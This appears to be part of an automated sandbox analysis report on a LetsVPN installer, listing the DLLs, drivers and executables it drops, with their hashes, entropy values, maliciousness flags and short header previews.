                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........E......................#.....................2...........................z.......z.......z.......z.......Rich............................PE..L.....^...........!.....R...B..............p...........................................@A........................ ...."..(...(....`.................. ....p...\......T...........................(...@............p...............................text....Q.......R.................. ..`.rdata..z....p.......V..............@..@.data....K.......>..................@....rsrc........`.......*..............@..@.reloc...\...p...^...,..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\tr\System.Web.Services.Description.resources.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21024
                                                                                                                                                                                                  Entropy (8bit):6.7465535147228035
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:8fH3xC8M83We6lWWhqWOHlLf2KQcvBZ9qxkS+ShjmM6IGBkSP:Wc8M8Ylq3b2KZBZ8kS+ST6nk8
                                                                                                                                                                                                  MD5:06870433B0EE21628CFBE438EDC9B057
                                                                                                                                                                                                  SHA1:F388968FC210531D664090E008A5D44F42931727
                                                                                                                                                                                                  SHA-256:08892141E0429AE283F7AC6B1702572D809828724F812B7AB7F7B248036053E4
                                                                                                                                                                                                  SHA-512:5CFE6C20C192C4FF02A6831B4CE504BEAC64A075008C74503D8EAF3759596CF47346E75B7E98307C441945CA5A24305A34706EFEF5CC68F1B4E9F97126347E85
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...S............." ..0.............J8... ...@....... ...............................h....@..................................7..O....@...............$.. ....`.......7............................................... ............... ..H............text...P.... ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B................,8......H.......P ...............%......\7......................................BSJB............v4.0.30319......l...D...#~...... ...#Strings............#US.........#GUID...........#Blob......................3......................................,.......................u...........Z.....Z.....Z...A.Z...^.Z.....Z...*.Z.................l.....l.....l...).l...1.l...9.l...A.l...I.l...Q.l...Y.l.......................#.....+.....3.@...;.e...C.y...K.....S.@.....................r.............

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\x64\WebView2Loader.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):139296
                                                                                                                                                                                                  Entropy (8bit):6.203667467899164
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:ypMrTPTNy56J4JQSfB6yRkkGvaYhfls6DREtfw6aQ5ck/e:y6PTQ6Ga+BtakGvVEtC1X
                                                                                                                                                                                                  MD5:98FF7764DA6B97CB3B8B26EECA105F71
                                                                                                                                                                                                  SHA1:28F319FD5A81B3B07FD0F329F7FD675A0E557ED0
                                                                                                                                                                                                  SHA-256:A04EBFCC5F4C641EAEF0DA0FCEB4D0AD65E91A636C723B8F5F4F41F1C4C1F2CD
                                                                                                                                                                                                  SHA-512:2D7D578069EB269855611074BEF654E03C7586F6943AD176B61FC4D3A77FC1402AF89E3F276D562951C9BCA72DC4FF40D3A03905947997D10D9CAA3ADBCE62D1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......`.........." ................P9.......................................p......a.....`A........................................G.......9...(....P.................. ....`......D...........................(....1..0..................8........................text............................... ..`.rdata.......0......................@..@.data...............................@....pdata..............................@..@.00cfg..(.... ......................@..@.tls.........0......................@..._RDATA.......@......................@..@.rsrc........P......................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\x86\WebView2Loader.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):113184
                                                                                                                                                                                                  Entropy (8bit):6.538622877633965
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:blzhJmad5M+ekPfJFVwKrSDnuP7HCt+/NyIDfEtPsn/j481sOV/L:blzqaHM+eCTrSDuP7ZbEtUnr51sON
                                                                                                                                                                                                  MD5:37C91BE50E2A9A003AA88E3E91A8BE65
                                                                                                                                                                                                  SHA1:5B728E04200CB5FFDB5A7D904C8AAE7A7FB9AC59
                                                                                                                                                                                                  SHA-256:03E6F5D7A82CD0A22FEEB48983044F8664C2DD319C8942518B224CFF26BC7EAD
                                                                                                                                                                                                  SHA-512:949230C263BD106CAC34CBE716EEAFE0181329DB381FA9EA435EEC432EF4F79886BEAFA3CE6DA996931EB2112560ADAD7D69DBFF12311F56196C52CFB427B9D1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......`.........."!.................4..............................................*G....@A.........................k.......l..(....................... .......L...Ph.......................f......`...............8n..8....i.......................text...e........................... ..`.rdata...k.......l..................@..@.data................d..............@....00cfg...............n..............@..@.tls.................p..............@....voltbl.H............r...................rsrc................t..............@..@.reloc..L............z..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\zh-CN\LetsPRO.resources.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):61984
                                                                                                                                                                                                  Entropy (8bit):6.282103236061246
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:k9DGL8sTvXOGdWRsd+rxGLhrI72RlDn5D4eH4Sq3b2KZBZ2S+ST6nki:kVGL8sTfLWRO+rUhrI7UT5DK93qKM/m8
                                                                                                                                                                                                  MD5:4B265A80F0C5DE434A73E76A2B20632C
                                                                                                                                                                                                  SHA1:E1A7664DE00AD7A0B0BF4054E22625FF6FAD7EB2
                                                                                                                                                                                                  SHA-256:C343E533D53557F6F50721F511559FCC94939CB56EEDCAA1E2299CBB2E4D2D14
                                                                                                                                                                                                  SHA-512:35B24E8CEB5310271E8CE12A885F08BE7BA720050837525877FE280893176E379B2EA2DEB47D42E030B2A787C850C58C1AB647E3B3B7DBE9F09FD0E4DE9B3CD4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....SMg...........!..................... ........... ....................... .......\....@.....................................S.......(............... ............................................................ ............... ..H............text........ ...................... ..`.rsrc...(...........................@..@.reloc..............................@..B........................H.......p...(...........P .............................................................lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.S9.a.......dx.*PS.4.E.:....:C;..u..n."..iP...T..:K..c7... ..n......Mn...~..*k;.E....5:.J.[.].o..H..........1..&...+.@..s.............7.Tk[......ue./.N.M.i..:...v....F.b.b.S^m.........pE...k....D.../L.e..-..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\zh-HK\LetsPRO.resources.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):62496
                                                                                                                                                                                                  Entropy (8bit):6.251413403033582
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:oGL8sTxyHu6RjvYDGE97we8oEN3qKK/ms:oGhVENm/7
                                                                                                                                                                                                  MD5:80FE3928FBBC68EAE87A7EC53B84CA57
                                                                                                                                                                                                  SHA1:0AECA1C566BA00782820A14B7B262E1191617D5F
                                                                                                                                                                                                  SHA-256:2DB64AE25EFEFC7208DEED114E4AB326C4718A7ADC78BF92642E4F3EDDD18610
                                                                                                                                                                                                  SHA-512:506946BD007C4BFB4777E7A52959CF6E078F6090DE1BCF077A79AAE437CA0F908842C0B89C114D42EB5223B188C3429CB788510B0050ACA92137D1DFE4195BF7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....SMg...........!................>.... ........... ....................... ............@.....................................S.......(............... ............................................................ ............... ..H............text...D.... ...................... ..`.rsrc...(...........................@..@.reloc..............................@..B................ .......H...........(...........P ..p...........................................l..............lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.S9.a.......dx.*PS.4.E.:....:C;..u..n."..iP...T..:K..c7... ..n......Mn...~..*k;.E....5:.J.[.].o..H..........1..&...+.@..s.............7.Tk[......ue./.N.M.i..:...v....F.b.b.S^m.........pE...k....D.../L.e..-..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\zh-Hans\System.Web.Services.Description.resources.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20512
                                                                                                                                                                                                  Entropy (8bit):6.968045952031746
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:jX3HhVhLu4y8VWe6lWihqWOHlLf2KQcvBZ96I03S+ShjmM6IGBkSF:z3h/aVq3b2KZBZ303S+ST6nkC
                                                                                                                                                                                                  MD5:949581689D35CF1D5EC2D231DAA57041
                                                                                                                                                                                                  SHA1:D6797330D56FBACE397073A8877119BB24F2E83D
                                                                                                                                                                                                  SHA-256:C7B7582C55F44F2DBF7752D181041DE94319DC91CED63031328D2F5A8AAB7C19
                                                                                                                                                                                                  SHA-512:73401AB7C27336C2C0FB284552D5AB2B03F1E0EE410E971FFD684C88D4A36EF213B14A3605B73336050C4B9FD918E7C86CBF8CE26B5F40809D8507BB3567F3B5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....R]..........." ..0..............7... ...@....... ....................................@.................................h7..O....@...............".. ....`......L7............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................7......H.......P ...............%.......6......................................BSJB............v4.0.30319......l...D...#~......(...#Strings............#US.........#GUID...........#Blob......................3......................................,.......................r...........Z.....Z.....Z...A.Z...^.Z.....Z...*.Z.................l.....l.....l...).l...1.l...9.l...A.l...I.l...Q.l...Y.l.......................#.....+.....3.@...;.e...C.y...K.....S.@...................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\zh-Hant\System.Web.Services.Description.resources.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20512
                                                                                                                                                                                                  Entropy (8bit):6.963516406614417
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:s/wkIv2FCcTWe6lWRhqWOHlLf2KQcvBZ9cPdsmS+ShjmM6IGBkSaq:Sgdsq3b2KZBZO1S+ST6nkvq
                                                                                                                                                                                                  MD5:9CBD975E602B3C1E52CAA03C1EBA9D89
                                                                                                                                                                                                  SHA1:3C32533E5A0221C9A26209ED4936669754BC550C
                                                                                                                                                                                                  SHA-256:3BF3C7DEFE57BF1C243E3424BA02355EE1C0340495ACE2BB082249A3544C1815
                                                                                                                                                                                                  SHA-512:B996ED512BC060AF88E66A6709C92DA9CAF686E4FB9E880139048E9B00A7F3C66A81AA63F589048D1D7EB15DBACAD0BDFEFE247D915C49FBDA322BCDF7F528BB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L............" ..0..............7... ...@....... ..............................p.....@.................................`7..O....@...............".. ....`......D7............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................7......H.......P ...............%.......6......................................BSJB............v4.0.30319......l...D...#~......(...#Strings............#US.........#GUID...........#Blob......................3......................................,.......................r...........Z.....Z.....Z...A.Z...^.Z.....Z...*.Z.................l.....l.....l...).l...1.l...9.l...A.l...I.l...Q.l...Y.l.......................#.....+.....3.@...;.e...C.y...K.....S.@...................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\zh-MO\LetsPRO.resources.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):62496
                                                                                                                                                                                                  Entropy (8bit):6.2532181397796105
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:kGL8sTxyHu6RjvYDGE97we8obd3qK//mY:kGhVbdD/j
                                                                                                                                                                                                  MD5:AF0601979DB922F247B0831F02566455
                                                                                                                                                                                                  SHA1:7496C66A37E8C8919CACB134777F273594EDC8BE
                                                                                                                                                                                                  SHA-256:652607BE33864DC6B89863B879925FCE2700FDC7A1752AD83485BDB956057814
                                                                                                                                                                                                  SHA-512:4156E43D1F04D66C78B3C80A8264B28061F2C052DC59B81023EC3D7D1E7A723A44F981087C5BE2334F2E03E6F4D51EA4275BFDC3CD25E4057D6A570681E9FFEC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....SMg...........!................>.... ........... ....................... ...........@.....................................S.......(............... ............................................................ ............... ..H............text...D.... ...................... ..`.rsrc...(...........................@..@.reloc..............................@..B................ .......H...........(...........P ..p...........................................l..............lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.S9.a.......dx.*PS.4.E.:....:C;..u..n."..iP...T..:K..c7... ..n......Mn...~..*k;.E....5:.J.[.].o..H..........1..&...+.@..s.............7.Tk[......ue./.N.M.i..:...v....F.b.b.S^m.........pE...k....D.../L.e..-..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\zh-SG\LetsPRO.resources.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):61984
                                                                                                                                                                                                  Entropy (8bit):6.282322783142791
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:pdDGL8sTvXOGdWRsd+rxGLhrI72RlDn5D4e+4oq3b2KZBZlnS+ST6nk5:p1GL8sTfLWRO+rUhrI7UT5DXL3qKT/mn
                                                                                                                                                                                                  MD5:DD3AFD8D30B794AFFA6A3AA81C31AFFD
                                                                                                                                                                                                  SHA1:969BC653E46555ED37482B754677A14FE4629E34
                                                                                                                                                                                                  SHA-256:AC606A00D4CAF0C0485EA9B5647F7104F5E0A13C5A88B8253A265B37ABFCFEBF
                                                                                                                                                                                                  SHA-512:880E508630B075B68A2DF05B7CE0BBDB84FEE427BFB65A8237B43FBDA6BB3BE99599021874DB2A17E56EF7F1AB803BA7A385004FB2EC563857DD9CFD1853654D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....SMg...........!..................... ........... ....................... ............@.....................................S.......(............... ............................................................ ............... ..H............text........ ...................... ..`.rsrc...(...........................@..@.reloc..............................@..B........................H.......p...(...........P .............................................................lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.S9.a.......dx.*PS.4.E.:....:C;..u..n."..iP...T..:K..c7... ..n......Mn...~..*k;.E....5:.J.[.].o..H..........1..&...+.@..s.............7.Tk[......ue./.N.M.i..:...v....F.b.b.S^m.........pE...k....D.../L.e..-..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\zh-TW\LetsPRO.resources.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):62496
                                                                                                                                                                                                  Entropy (8bit):6.252146524644364
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:rGL8sTxyHu6RjvYDGE97we8oRx3qKh/mN:rGhVRxl/+
                                                                                                                                                                                                  MD5:E8F404437EE5E95C3B0971985216778B
                                                                                                                                                                                                  SHA1:F642530C433131B29459EB942C5157FAB7B0B664
                                                                                                                                                                                                  SHA-256:D1EDD534AE26455AEDBC4CB720DEFC618CF669631E6C4EAE66267B91DB625B95
                                                                                                                                                                                                  SHA-512:790F2E5A3D7AE5CA06CAAF58C4CE3EA20A1DE647A537DCCF9235A7BB8841075A5C8FDEB871D495CFC04EEDECD895A8D70B6D2BB24C506143FF6A2CA2775C4599
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....SMg...........!................>.... ........... ....................... .......$....@.....................................S.......(............... ............................................................ ............... ..H............text...D.... ...................... ..`.rsrc...(...........................@..@.reloc..............................@..B................ .......H...........(...........P ..p...........................................l..............lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.S9.a.......dx.*PS.4.E.:....:C;..u..n."..iP...T..:K..c7... ..n......Mn...~..*k;.E....5:.J.[.].o..H..........1..&...+.@..s.............7.Tk[......ue./.N.M.i..:...v....F.b.b.S^m.........pE...k....D.../L.e..-..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\driver\OemVista.inf

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7632
                                                                                                                                                                                                  Entropy (8bit):5.063558190257152
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:wr8tW9yCTi3x4vlQd22bjR+iAUC7bMP+io3DcNSj6jvKFkPs7EQTXvt1Ld4Z:LWlGNdkkzo3DcNSj6jvKFkPs7EQTXvtk
                                                                                                                                                                                                  MD5:26009F092BA352C1A64322268B47E0E3
                                                                                                                                                                                                  SHA1:E1B2220CD8DCAEF6F7411A527705BD90A5922099
                                                                                                                                                                                                  SHA-256:150EF8EB07532146F833DC020C02238161043260B8A565C3CFCB2365BAD980D9
                                                                                                                                                                                                  SHA-512:C18111982CA233A7FC5D1E893F9BD8A3ED739756A47651E0638DEBB0704066AF6B25942C7961CDEEDF953A206EB159FE50E0E10055C40B68EB0D22F6064BB363
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:; ****************************************************************************..; * Copyright (C) 2002-2014 OpenVPN Technologies, Inc. *..; * This program is free software; you can redistribute it and/or modify *..; * it under the terms of the GNU General Public License version 2 *..; * as published by the Free Software Foundation. *..; ****************************************************************************....; SYNTAX CHECKER..; cd \WINDDK\3790\tools\chkinf..; chkinf c:\src\openvpn\tap-win32\i386\oemvista.inf..; OUTPUT -> file:///c:/WINDDK/3790/tools/chkinf/htm/c%23+src+openvpn+tap-win32+i386+__OemWin2k.htm....; INSTALL/REMOVE DRIVER..; tapinstall install OemVista.inf tapoas..; tapinstall update OemVista.inf tapoas..; tapinstall remove tapoas....;*********************************************************..; Note to Developers:..;..; If you are bundling the TAP-Windows driver with your app,..; you should try

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\driver\tap0901.cat

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10739
                                                                                                                                                                                                  Entropy (8bit):7.214364446291792
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:JDVLGVDFfap5UEwQl/WGhYCt17vJ4qnaj6jQc:7GCpzlnh3t1x4l2jn
                                                                                                                                                                                                  MD5:F73AC62E8DF97FAF3FC8D83E7F71BF3F
                                                                                                                                                                                                  SHA1:619A6E8F7A9803A4C71F73060649903606BEAF4E
                                                                                                                                                                                                  SHA-256:CC74CDB88C198EB00AEF4CAA20BF1FDA9256917713A916E6B94435CD4DCB7F7B
                                                                                                                                                                                                  SHA-512:F81F5757E0E449AD66A632299BCBE268ED02DF61333A304DCCAFB76B2AD26BAF1A09E7F837762EE4780AFB47D90A09BF07CB5B8B519C6FB231B54FA4FBE17FFE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:0.)...*.H........).0.)....1.0...`.H.e......0..i..+.....7.....Z0..V0...+.....7.......r?.X.M.....F.A..201008141946Z0...+.....7.....0..T0.... .....S!F.3....#.a.2`..e...#e...1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........o.e.m.v.i.s.t.a...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .....S!F.3....#.a.2`..e...#e...0...."~..m..8C. i$.4.l..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0:..+.....7...1,0*...F.i.l.e........t.a.p.0.9.0.1...s.y.s...0.... ..j(.M<.cR..XrT....F..R.]....?1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0:..+.....7...1,0*...F.i.l.e........t.a.p.0.9.0.1...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... ..j(.M<.cR..XrT....F..R.]....?0.....".....A.Rw..... .1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........o.e.m.v.i.s.t.a...i.n.f.......0...0....+.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\driver\tap0901.sys

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):39920
                                                                                                                                                                                                  Entropy (8bit):6.338128217115975
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:XtCuL1O/+AphG3F9NlXt5oZhDzbV104mmuiExsFwQvYp33U35:XdCoTxk1lmmjExsFNvYtk
                                                                                                                                                                                                  MD5:C10CCDEC5D7AF458E726A51BB3CDC732
                                                                                                                                                                                                  SHA1:0553AAB8C2106ABB4120353360D747B0A2B4C94F
                                                                                                                                                                                                  SHA-256:589C5667B1602837205DA8EA8E92FE13F8C36048B293DF931C99B39641052253
                                                                                                                                                                                                  SHA-512:7437C12AE5B31E389DE3053A55996E7A0D30689C6E0D10BDE28F1FBF55CEE42E65AA441B7B82448334E725C0899384DEE2645CE5C311F3A3CFC68E42AD046981
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~..[...[...[....w..Z....w..^...[...m....w.._....w..^.../t..Q.../t..Z.../t..Z...Rich[...........................PE..d......_.........."......Z.....................@....................................=w....`A....................................................<.......X....p..T....x...#...........R..8............................S...............P...............................text..._>.......@.................. ..h.rdata.......P.......D..............@..H.data........`.......P..............@....pdata..T....p.......R..............@..HPAGE.................V.............. ..`INIT.................d.............. ..b.rsrc...X............p..............@..B.reloc...............v..............@..B................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\driver\tapinstall.exe

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):101536
                                                                                                                                                                                                  Entropy (8bit):5.597950959538587
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:ImYSYxGfIZnRnD6M7EFOUakPhtUn6KXF4O7WfvZt9c:HYFZnRDGdvPXU6K1RW
                                                                                                                                                                                                  MD5:1E3CF83B17891AEE98C3E30012F0B034
                                                                                                                                                                                                  SHA1:824F299E8EFD95BECA7DD531A1067BFD5F03B646
                                                                                                                                                                                                  SHA-256:9F45A39015774EEAA2A6218793EDC8E6273EB9F764F3AEDEE5CF9E9CCACDB53F
                                                                                                                                                                                                  SHA-512:FA5CF687EEFD7A85B60C32542F5CB3186E1E835C01063681204B195542105E8718DA2F42F3E1F84DF6B0D49D7EEBAD6CB9855666301E9A1C5573455E25138A8B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........V........-.....;......<.......+....%......S....%......2....~......,.....)...Rich..........PE..d...<..W..........".................Tv............................................... ....@.......... ..................................................h.......l....D...H...p..........................................................X............................text............................... ..`.data...............................@....pdata..l...........................@..@.rsrc...h...........................@..@.reloc..z....p.......B..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\ndp462-web.exe

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1429344
                                                                                                                                                                                                  Entropy (8bit):7.9320530592846135
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:8XWYAlLlqSmtLvUDSRbm4Jah1rVxzY8Ja1xbLAAAOurzXuV1F+eAXvUS1vlPA:8mYAlLfeTUDBzrVxzYTOTOu3Xu5AX/l4
                                                                                                                                                                                                  MD5:B5A67867CDCE86E09E2625A6FA4D5FEA
                                                                                                                                                                                                  SHA1:C42E6ED280290648BBD59F664008852F4CFE4548
                                                                                                                                                                                                  SHA-256:5E21C85034311C51D8B0367A773D475AF2392B3DDCD90676C61697C6B5FD2E6A
                                                                                                                                                                                                  SHA-512:31D7081BFFEEB5F32457096E51A29236306E5D971DE7EDB80A51188BCCDA9B9F17F0C3593D30828FC140B7A023F5B6842BC922F2023C7B8EA3786C2DBEC40472
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......So....x...x...x.......x.0.....x......x.xx..<.x.xx....x.xx..~.x......x...y...x.....Q.x.......x.......x.......x.Rich..x.........................PE..L.....\V.........."......l...t...................@..........................@.......)....@...... ..................`z...................................>..........@................................V..@............................................text....j.......l.................. ..`.data...@7...........p..............@....idata..H...........................@..@.boxld01............................@..@.rsrc............ ..................@..@.reloc...(.......*..................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\uninst.exe

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):100646
                                                                                                                                                                                                  Entropy (8bit):7.0924503598442445
                                                                                                                                                                                                  Encrypted:false
